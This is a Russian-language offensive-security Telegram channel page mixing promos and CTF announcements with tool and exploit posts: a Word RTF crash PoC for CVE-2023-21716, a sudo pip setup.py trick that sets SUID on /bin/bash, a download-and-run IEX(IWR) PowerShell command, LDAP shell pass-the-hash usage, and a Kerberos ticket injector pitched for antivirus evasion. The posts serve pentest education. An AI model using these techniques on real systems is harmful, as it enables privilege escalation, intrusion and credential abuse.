Похек
16.6K subscribers
2.11K photos
110 videos
243 files
3.08K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from Private Shizo
👨‍💻 Начинаешь карьеру в информационной безопасности? Приходи на оплачиваемую стажировку ВТБ — Школу по информационной безопасности!

⚡️ За 3 месяца ты получишь знания от экспертов ВТБ, опыт работы в топовой компании + навыки, необходимые для дальнейшего роста. Ну и конечно, конкурентную зарплату, ДМС со стоматологией, скидки от партнеров и многое-многое другое!

А еще:
— возможность перейти в штат по итогам стажировки с повышением оклада;
— надежную и стабильную работу в одном из крупнейших банков страны;
— нетворкинг и погружение в профессиональное комьюнити;
— обучение 40% времени, чтобы твои знания оставались самыми востребованными!

👾 Успей зарегистрироваться на стажировку: https://bit.ly/infosec-intern-VTB

#промо
🗿5🔥3
Класс, новая программа на bi.zone
Forwarded from BI.ZONE Bug Bounty
🪲 +1 программа: Timeweb на BI.ZONE Bug Bounty

Встречайте новую программу от Timeweb — одного из крупнейших облачных провайдеров России!

Вилка выплат — от 10 000 до 250 000 рублей. Стоимость бага зависит от критичности и домена.

Скоуп в этот раз просто огромный: одного поста не хватит, чтобы перечислить все.

Так что смотрите список доменов и прайс на нашей платформе!
Please open Telegram to view this post
VIEW IN TELEGRAM
Форум CISO-FORUM XVI
🫡6
Serv-U [v.15.3.0.X] Directory-Traversal
CVE-2021-35250


Уязвимость позволяет удаленному пользователю выполнить атаку Directory Traversal, отправив специально созданный HTTP запрос и прочитав произвольные файлы в системе. Чтение файлов возможно только на диске C:\, злоумышленник может получить информацию о файловом сервере, только зная путь к файлам.

Известно 3 варианта того, какие файлы и как может читать злоумышленник:
1. Файлы Windows по умолчанию. Пример: "C:\Windows\win.ini";
2. Обнаружение файлов с помощью брутфорса;
3. Определение путей к файлам в файлах Windows по умолчанию или используемого программного обеспечения на сервере.
🔥5
LDAP shell

Этот проект является форком проекта ldap_shell - impacket.

Подготовка:
sudo apt install -y python3

Установка:
git clone https://github.com/z-Riocool/ldap_shell.git ;cd ldap_shell ; python3 -m pip install .

Пример использования:
ldap_shell.py domain.local/user:password
ldap_shell domain.local/user:password -dc-ip 192.168.1.2
ldap_shell domain.local/user -hashes aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404e1
export KRB5CCNAME=/home/user/ticket.ccache
ldap_shell -k -no-pass domain.local/user

#tools
0-CLICK Microsoft Word RCE exploit
CVE-2023-21716 Python

RTF Crash POC Python 3.11 Windows 10

PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join( ("{\\f%dA;}\n" % i) for i in range(0,32761) ) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

#CVE #RCE
22 апреля пройдет task-based КибХак CTF совместно с mireaCTF (Potee) в режиме онлайн.

👻 За призовые места вы сможете получить фирменные стикеры КибХак и ценные денежные призы. В том числе по результатам соревнований будут вручены проходки на предстоящую конференцию Positive Hack Days 12. А также, возможно, одна из команд сможет пойти на пхд и посоревноваться там 😊

Правила те же, что и всегда: команды решают задания по информационной безопасности и получают «флаги», за которые начисляются баллы.

❗️ Начало в 18:00
👨‍💻 Длительность 18 часов до 12:00 воскресенья

Будут представлены задачи следующих категорий:
crypto, forensics, misc, osint, reverse, stego, web

В каждой команде должно быть не более 5-ти человек

Вся информация будет в канале mireaCTF:
https://t.me/mireactf

И в беседах КибХак и mireaCTF:
https://t.me/+TS7yGrOwxSJZP8Q3
https://t.me/+SFTJE5BHTJ0PoHq4

Регистрация уже доступна на:

https://ctf.potee.ru
🔥2🐳1🗿1
Forwarded from RedTeam brazzers (Миша)
Injector.png
1.1 MB
Итак, продолжаем заниматься импортозамещением учиться быть настоящим Red Team'ом и не использовать mimikatz! Недавно у меня вышла статья по инжекту тикетов с помощью плюсовой программы. Но потом мы вспоминаем об антивирусах и становится не так весело. Каждый раз брать проект, добавлять защиту, перекомпиливать... не вариант.
Поэтому появилась идея создания инжектора билетов на Powershell. Во-первых, это удобно, во-вторых, защищать и обфусцировать намного быстрее. Есть как готовые фреймворки , так и статьи с инструкциями.

Результатом работы стал небольшой скрипт, который должен помочь атакующему во время тестирования на проникновение. Теперь вы можете инжектить тикеты, используя Powershell! Поддерживаются два режима работы:
1. Инжект тикета, предоставленного в файле .kirbi
2. Инжект тикета, предоставленного в формате base64

Полный код можно увидеть на моем гитхабе


По любым вопросам, болячкам и возможным недочетам тулзы смело пишите мне :)
Forwarded from Monkey Hacker
Privilege Escalation via pip

Всеми наш любимый pip позволяет автоматически запускать код, когда разработчики просто загружают пакет. Таким образом мы можем скачать пакет и использовать эту возможность для повышения привилегий

После того, как мы сделали sudo -l. Мы видим, что pip download или pip setup можно запустить от sudo, так что давайте этим воспользуемся.
Сначала скопируем нужный нам репозиторий

Затем давайте сделаем некоторые изменения в файле setup.py. Импортируем os для запуска наших команд и в функции RunCommand поместим os.system("chmod u+s /bin/bash").

Собираем

python3 -m build

И скачиваем наш пакет

sudo pip3 download http://localhost/your-file.tar.gz

И теперь запустим шелл

bash -p

Have fun 👍

P.S
Полный код в комментариях

THX:
https://medium.com/checkmarx-security/automatic-execution-of-code-upon-package-download-on-python-package-manager-cd6ed9e366a8
Please open Telegram to view this post
VIEW IN TELEGRAM
3🐳1
​​Atomic Red Team

Всем привет! Извиняюсь, что давно не делал посты, загружен всем подряд. Постараюсь исправиться)
Я думаю многие из нас знакомы с Atomic Red Team. Но если нет, то давайте кратко пройдемся. Это некая библиотека PowerShell скриптов основанная на MITRE. Данный фреймворк предназначен не только для красной команды, но и для защитников, которые желают проверить свои же средства защиты. Этот фреймворк является самым популярным и полным "чек-листом" для проверки ИБ вашей рабочей среды.
Atomic Red Team предназначен не только для Windows, но и Linux + MacOS. Так что вы можете протестировать всё что вам нужно)

Команда для импорта тестов:
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing); Install-AtomicRedTeam

Далее советую вам обратиться к этой и этой странице документации. Вы можете загрузить все тесты, но лучше конечно под конкретную операционную систему)

Пример запуска тестов:
Invoke-AtomicTest T1003.003 - просто запуск теста или группы тестов
Invoke-AtomicTest T1003.003 -TestNumbers 1,2 - вы выбрали только 1 и 2 тесты из группы
Invoke-AtomicTest T1003.003 -ShowDetails - вы сможете прочитать подробную информацию о конкретном тесте/ах

Для безумцев:
Invoke-AtomicTest All

Также советую вам посмотреть интересное видео от наших западных коллег об этом прекрасном инструменте)

#tools
6👍1
Media is too big
VIEW IN TELEGRAM
🔴PentestGPT

Дада, снова речь про ChatGPT, но стой, не закрывай канал. В данном случае ChatGPT выступает именно в роли помощника в пентесте. Ты задаешь ей цель, она тебе расписывает шаги для пентеста. Далее вы сами выполняете сканирование, скидываете результаты обратно ChatGPT и она анализирует ваши результаты. Звучит довольно круто, не правда ли?)

Пока ещё проект находится на стадии разработки, но вы уже можете оценить результаты на гитхабе разработчика. К посту прикреплено видео с "демонстрацией силы" бота.

По установке в посте её будет сложно уместить, так что советую перейти к гитхаб и там изучить её досконально.

#chatgpt #tools
6🔥1
Forwarded from SHADOW:Group
⚙️ Удобный вывод FFUF

Когда нужен читабельный вывод от ffuf:

ffuf -u https://target.com/FUZZ -w /mnt/data/SecLists/Discovery/Web-Content/raft-small-words.txt -o ffuf.csv -of csv

cat ffuf.csv | awk -F , '{print $2","$5","$6","$9}'| column -s, -t

#web #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
Цены на TryHackMe повысятся в октябре этого года

Сейчас:
10$ ≈ 800 рублей

Будет:
14$ ≈ 1120 рублей

При курсе:
1$ = 80.14 рублей

Дневник Безопасника 🛡️
Мегадрон. Строим хакерский беспилотник — дальнобойный и с защитой от глушилок

Ты сидишь за кла­виату­рой на одном из вер­хних эта­жей охра­няемо­го зда­ния, рас­положен­ного пос­реди зак­рытой тер­ритории в окру­жении забора с колючей про­воло­кой под нап­ряжени­ем. Ты чувс­тву­ешь себя в пол­ной безопас­ности — за ней сле­дят не толь­ко камеры, но и бди­тель­ная охра­на. За окном раз­дает­ся подоз­ритель­ное жуж­жание, ты отвле­каешь­ся на непонят­ный источник зву­ка, и этих нес­коль­ких секунд дос­таточ­но, что­бы на твой компь­ютер уста­новил­ся бэк­дор, а хакер, рас­положен­ный в 20 км от тебя, про­ник в кор­поратив­ную сеть. Фан­тасти­ка? Ничего подоб­ного!

#дроны
❤‍🔥3
charm_

Whatcha doing in a browser? You can try out our newest stuff right from the CLI.

#tools